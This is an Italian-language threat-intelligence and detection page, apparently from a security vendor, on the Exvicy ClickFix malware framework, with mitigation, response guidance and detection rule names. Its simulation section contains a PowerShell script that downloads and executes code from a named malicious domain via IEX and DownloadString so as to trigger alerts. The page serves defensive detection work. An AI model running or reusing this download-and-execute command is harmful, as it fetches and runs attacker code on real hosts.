Exvicy: Un clone del framework di distribuzione di malware ErrTraffic
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Exvicy è un framework emergente di Malware-as-a-Service (MaaS) denominato ClickFix, promosso nei forum di criminalità informatica. Utilizza l’ingegneria sociale imitando le sfide Turnstile di Cloudflare per convincere gli utenti a eseguire comandi PowerShell dannosi tramite la finestra di dialogo Esegui di Windows. Il framework copia da vicino ErrTraffic, riutilizzando ampie porzioni del suo codice JavaScript e delle tecniche di offuscamento.
Investigazione
Gli analisti TDR si sono basati su uno screenshot di un pannello di amministrazione condiviso sul forum Exploit.IN per scoprire infrastrutture C2 attive. Analizzando specifici nameserver di Cloudflare e modelli di registrazione di domini, i ricercatori hanno identificato più domini dannosi e siti Web WordPress compromessi. L’analisi tecnica ha confermato un ampio riutilizzo del codice ErrTraffic, comprese funzioni JavaScript distintive e logica anti-analisi.
Mitigazione
Le organizzazioni dovrebbero implementare un filtraggio web robusto per bloccare domini noti dannosi e TLD sospetti associati a queste campagne. La protezione endpoint dovrebbe monitorare e limitare l’esecuzione anomala di PowerShell, in particolare i comandi coinvolgenti irm or iex. Gli utenti dovrebbero anche essere formati per riconoscere i prompt di ingegneria sociale che li istruiscono a utilizzare scorciatoie da tastiera come Win+R per eseguire comandi.
Risposta
Se viene rilevata attività di Exvicy, gli host interessati devono essere isolati immediatamente per interrompere l’esecuzione di ulteriori comandi o la consegna di payload. Gli addetti alla risposta dovrebbero esaminare i log operativi di PowerShell per identificare i comandi eseguiti e le connessioni di rete correlate. Gli indirizzi IP e i domini C2 noti dovrebbero essere bloccati al perimetro, seguiti da una ricerca per altri asset WordPress compromessi nell’ambiente.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevazioni
Comando e Controllo Sospetti tramite Richiesta DNS con Dominio di Primo Livello (TLD) Insolito (via dns)
Voce RunMRU Sospetta con Semantica LOLBin (via registry_event)
IOC (SourceIP) per rilevare: Exvicy: Una copia del framework di distribuzione malware ErrTraffic
IOC (DestinationIP) per rilevare: Exvicy: Una copia del framework di distribuzione malware ErrTraffic
Rilevazione di Esecuzione Comandi PowerShell Dannosi per il Malware Exvicy [Windows Powershell]
Esecuzione Comandi del Framework Exvicy tramite Scorciatoia Win + R [Creazione di Processi Windows]
Esecuzione di Simulazione
-
Narrativa & Comandi di Attacco: Un avversario fornisce a un utente un collegamento o documento dannoso tramite phishing. All’esecuzione (T1204.002), l’utente inavvertitamente avvia un processo PowerShell (T1059.001). L’obiettivo dell’attaccante è stabilire un punto d’appoggio scaricando un payload secondario. Per imitare il framework Exvicy, la riga di comando è costruita per includere il dominio specifico noto per essere dannoso
recaptcha-check.com/8E9curHNH8UfAMLzper scaricare l’agente dannoso. -
Script di Test di Regressione:
# Script di simulazione per attivare la regola di rilevazione Exvicy. # Questo imita i modelli di riga di comando identificati nella regola Sigma. $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz" $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`"" Write-Host "[+] Avvio della Simulazione: esecuzione del comando per attivare il rilevamento..." Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`"" Write-Host "[+] Comando di simulazione inviato. Controlla SIEM per gli avvisi." -
Comandi di Pulizia:
# Pulizia: Nessun file permanente viene creato da questa specifica simulazione, # ma assicuriamo che non vi siano processi PowerShell residui in esecuzione. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue Write-Host "[+] Pulizia completata."